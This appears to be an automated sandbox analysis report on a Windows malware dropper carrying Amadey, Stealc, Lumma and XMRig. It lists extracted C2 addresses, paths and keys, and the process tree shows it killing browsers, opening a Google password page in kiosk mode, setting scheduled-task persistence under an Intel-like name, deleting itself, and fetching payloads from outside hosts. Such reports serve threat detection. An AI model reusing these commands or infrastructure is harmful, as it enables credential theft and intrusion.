Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  • submitted
    22-12-2024 02:28

General

  • Target

    bc240f565f4a4aab03cdf04b6ae4522179347145e338ef33df918e741afc5ebb.exe

  • Size

    3.1MB

  • MD5

    aefbd9e285960b704524b4c33b0c9567

  • SHA1

    688eb719525b89f93db7d22bcbae38a13e7a973b

  • SHA256

    bc240f565f4a4aab03cdf04b6ae4522179347145e338ef33df918e741afc5ebb

  • SHA512

    9186ca00f1451b750f59bc999e696964866639a06018e4ad241dd5ddf85550ffdd370d91e72f45a04644f555c150021383e16b29f7c0c27cb8b7cf9465e0ad8f

  • SSDEEP

    49152:iIUtVtTZ0pIj3/bL4zoK79ucME+bkhG+WA73nilkwo:iIkVtTZ0pIj3vK79ucL+b9A73R

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
  • XMRig Miner payload 10 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 20 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL 34 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 5 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of FindShellTrayWindow 16 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bc240f565f4a4aab03cdf04b6ae4522179347145e338ef33df918e741afc5ebb.exe
    "C:\Users\Admin\AppData\Local\Temp\bc240f565f4a4aab03cdf04b6ae4522179347145e338ef33df918e741afc5ebb.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2916
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2820
      • C:\Users\Admin\AppData\Local\Temp\1019835001\ac7623e0c4.exe
        "C:\Users\Admin\AppData\Local\Temp\1019835001\ac7623e0c4.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2024
      • C:\Users\Admin\AppData\Local\Temp\1019836001\7cfad91fc9.exe
        "C:\Users\Admin\AppData\Local\Temp\1019836001\7cfad91fc9.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1524
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM firefox.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1892
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM chrome.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2060
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM msedge.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1292
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM opera.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:760
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM brave.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3036
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1036
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
            5⤵
            • Checks processor information in registry
            • Modifies registry class
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:2296
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2296.0.1404455840\1731484669" -parentBuildID 20221007134813 -prefsHandle 1236 -prefMapHandle 1212 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {642f6ec7-9cae-4690-81fc-76e89f092ecb} 2296 "\\.\pipe\gecko-crash-server-pipe.2296" 1336 fdd9b58 gpu
              6⤵
                PID:1808
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2296.1.1516400380\477590206" -parentBuildID 20221007134813 -prefsHandle 1516 -prefMapHandle 1496 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a725f10-bca8-4577-ad7a-a2555a04f807} 2296 "\\.\pipe\gecko-crash-server-pipe.2296" 1544 42fbc58 socket
              6⤵
              PID:2768
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2296.2.1935291538\1541497046" -childID 1 -isForBrowser -prefsHandle 2024 -prefMapHandle 2020 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {65e42d31-60e9-4c8c-ac5c-86a37a758a71} 2296 "\\.\pipe\gecko-crash-server-pipe.2296" 2036 19a8d758 tab
              6⤵
              PID:2424
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2296.3.2112403813\1832497782" -childID 2 -isForBrowser -prefsHandle 2660 -prefMapHandle 2656 -prefsLen 26151 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b871d18b-51de-4178-9d8c-779050455489} 2296 "\\.\pipe\gecko-crash-server-pipe.2296" 2672 13649658 tab
              6⤵
              PID:912
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2296.4.1327232127\99305627" -childID 3 -isForBrowser -prefsHandle 3692 -prefMapHandle 3684 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {faf45c3e-aac6-4bd4-8a42-06dedccf6ec6} 2296 "\\.\pipe\gecko-crash-server-pipe.2296" 3704 1edd1e58 tab
              6⤵
              PID:2540
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2296.5.1583383412\1572636511" -childID 4 -isForBrowser -prefsHandle 3844 -prefMapHandle 3848 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cdf9167f-89c1-4e16-afe1-f30062fe38ba} 2296 "\\.\pipe\gecko-crash-server-pipe.2296" 3832 1edd0658 tab
              6⤵
              PID:1380
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2296.6.1957647338\148252624" -childID 5 -isForBrowser -prefsHandle 4008 -prefMapHandle 4012 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {89ff248d-7985-4a29-b4c4-900a77f93718} 2296 "\\.\pipe\gecko-crash-server-pipe.2296" 3996 1edcf158 tab
              6⤵
              PID:1780
      • C:\Users\Admin\AppData\Local\Temp\1019837001\191490ec7b.exe
        "C:\Users\Admin\AppData\Local\Temp\1019837001\191490ec7b.exe"
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Windows security modification
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:408
      • C:\Users\Admin\AppData\Local\Temp\1019838001\aba28f5646.exe
        "C:\Users\Admin\AppData\Local\Temp\1019838001\aba28f5646.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1012
        • C:\Windows\system32\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
          4⤵
          • Loads dropped DLL
          PID:1964
          • C:\Windows\system32\mode.com
            mode 65,10
            5⤵
            PID:780
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e file.zip -p24291711423417250691697322505 -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:1856
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_7.zip -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:908
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_6.zip -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:608
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_5.zip -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:1952
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_4.zip -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:2908
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_3.zip -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:2988
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_2.zip -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:1856
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_1.zip -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:608
          • C:\Windows\system32\attrib.exe
            attrib +H "in.exe"
            5⤵
            • Views/modifies file attributes
            PID:780
          • C:\Users\Admin\AppData\Local\Temp\main\in.exe
            "in.exe"
            5⤵
            • Executes dropped EXE
            PID:2988
            • C:\Windows\system32\attrib.exe
              attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
              6⤵
              • Views/modifies file attributes
              PID:1880
            • C:\Windows\system32\attrib.exe
              attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
              6⤵
              • Views/modifies file attributes
              PID:1896
            • C:\Windows\system32\schtasks.exe
              schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
              6⤵
              • Scheduled Task/Job: Scheduled Task
              PID:1524
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell ping 127.0.0.1; del in.exe
              6⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1648
              • C:\Windows\system32\PING.EXE
                "C:\Windows\system32\PING.EXE" 127.0.0.1
                7⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                • Runs ping.exe
                PID:3148
      • C:\Users\Admin\AppData\Local\Temp\1019839001\ef0449806c.exe
        "C:\Users\Admin\AppData\Local\Temp\1019839001\ef0449806c.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3592
      • C:\Users\Admin\AppData\Local\Temp\1019840001\97466ab734.exe
        "C:\Users\Admin\AppData\Local\Temp\1019840001\97466ab734.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        PID:3844
        • C:\Users\Admin\AppData\Local\Temp\e458d263c0\Gxtuum.exe
          "C:\Users\Admin\AppData\Local\Temp\e458d263c0\Gxtuum.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:3912
      • C:\Users\Admin\AppData\Local\Temp\1019841001\df1fc80896.exe
        "C:\Users\Admin\AppData\Local\Temp\1019841001\df1fc80896.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Adds Run key to start application
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:4040
        • C:\Program Files\Windows Media Player\graph\graph.exe
          "C:\Program Files\Windows Media Player\graph\graph.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:2624
      • C:\Users\Admin\AppData\Local\Temp\1019842001\64f8e9067b.exe
        "C:\Users\Admin\AppData\Local\Temp\1019842001\64f8e9067b.exe"
        3⤵
        PID:3388
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {4B829401-F28F-40D4-943C-2212B599566B} S-1-5-21-3551809350-4263495960-1443967649-1000:NNYJZAHP\Admin:Interactive:[1]
    1⤵
    • Loads dropped DLL
    PID:3176
    • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
      C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      PID:3208
      • C:\Windows\explorer.exe
        explorer.exe
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3240
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
        3⤵
        • Drops file in System32 directory
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3284
        • C:\Windows\system32\PING.EXE
          "C:\Windows\system32\PING.EXE" 127.1.10.1
          4⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3368

                    Network

                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 4
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:29:02 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 156
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:29:04 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:29:47 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:30:01 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:30:28 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:30:46 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:31:00 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:31:14 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:31:18 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • RU
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:31:22 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • RU
                      GET
                      http://185.215.113.16/luma/random.exe
                      skotes.exe
                      Remote address:
                      185.215.113.16:80
                      Request
                      GET /luma/random.exe HTTP/1.1
                      Host: 185.215.113.16
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:29:04 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 1854976
                      Last-Modified: Sun, 22 Dec 2024 02:27:11 GMT
                      Connection: keep-alive
                      ETag: "676778ff-1c4e00"
                      Accept-Ranges: bytes
                    • RU
                      GET
                      http://185.215.113.16/steam/random.exe
                      skotes.exe
                      Remote address:
                      185.215.113.16:80
                      Request
                      GET /steam/random.exe HTTP/1.1
                      Host: 185.215.113.16
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:29:46 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 2957824
                      Last-Modified: Sun, 22 Dec 2024 02:27:22 GMT
                      Connection: keep-alive
                      ETag: "6767790a-2d2200"
                      Accept-Ranges: bytes
                    • RU
                      GET
                      http://185.215.113.16/well/random.exe
                      skotes.exe
                      Remote address:
                      185.215.113.16:80
                      Request
                      GET /well/random.exe HTTP/1.1
                      Host: 185.215.113.16
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:30:01 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 965120
                      Last-Modified: Sun, 22 Dec 2024 02:24:49 GMT
                      Connection: keep-alive
                      ETag: "67677871-eba00"
                      Accept-Ranges: bytes
                    • RU
                      GET
                      http://185.215.113.16/off/random.exe
                      skotes.exe
                      Remote address:
                      185.215.113.16:80
                      Request
                      GET /off/random.exe HTTP/1.1
                      Host: 185.215.113.16
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:30:27 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 2858496
                      Last-Modified: Sun, 22 Dec 2024 02:25:24 GMT
                      Connection: keep-alive
                      ETag: "67677894-2b9e00"
                      Accept-Ranges: bytes
                    • RU
                      GET
                      http://185.215.113.206/
                      ac7623e0c4.exe
                      Remote address:
                      185.215.113.206:80
                      Request
                      GET / HTTP/1.1
                      Host: 185.215.113.206
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Sun, 22 Dec 2024 02:30:02 GMT
                      Server: Apache/2.4.41 (Ubuntu)
                      Content-Length: 0
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • RU
                      POST
                      http://185.215.113.206/c4becf79229cb002.php
                      ac7623e0c4.exe
                      Remote address:
                      185.215.113.206:80
                      Request
                      POST /c4becf79229cb002.php HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----KJKKKJJJKJKFHJJJJECB
                      Host: 185.215.113.206
                      Content-Length: 211
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Sun, 22 Dec 2024 02:30:02 GMT
                      Server: Apache/2.4.41 (Ubuntu)
                      Content-Length: 8
                      Keep-Alive: timeout=5, max=99
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • US
                      DNS
                      spocs.getpocket.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      spocs.getpocket.com
                      IN A
                      Response
                      spocs.getpocket.com
                      IN CNAME
                      prod.ads.prod.webservices.mozgcp.net
                      prod.ads.prod.webservices.mozgcp.net
                      IN A
                      34.117.188.166
                    • US
                      DNS
                      getpocket.cdn.mozilla.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      getpocket.cdn.mozilla.net
                      IN A
                      Response
                      getpocket.cdn.mozilla.net
                      IN CNAME
                      getpocket-cdn.prod.mozaws.net
                      getpocket-cdn.prod.mozaws.net
                      IN CNAME
                      prod.pocket.prod.cloudops.mozgcp.net
                      prod.pocket.prod.cloudops.mozgcp.net
                      IN A
                      34.120.5.221
                    • US
                      DNS
                      youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube.com
                      IN A
                      Response
                      youtube.com
                      IN A
                      172.217.18.206
                    • US
                      DNS
                      prod.ads.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.ads.prod.webservices.mozgcp.net
                      IN A
                      Response
                      prod.ads.prod.webservices.mozgcp.net
                      IN A
                      34.117.188.166
                    • US
                      DNS
                      prod.pocket.prod.cloudops.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.pocket.prod.cloudops.mozgcp.net
                      IN A
                      Response
                      prod.pocket.prod.cloudops.mozgcp.net
                      IN A
                      34.120.5.221
                    • US
                      GET
                      https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                      firefox.exe
                      Remote address:
                      34.120.5.221:443
                      Request
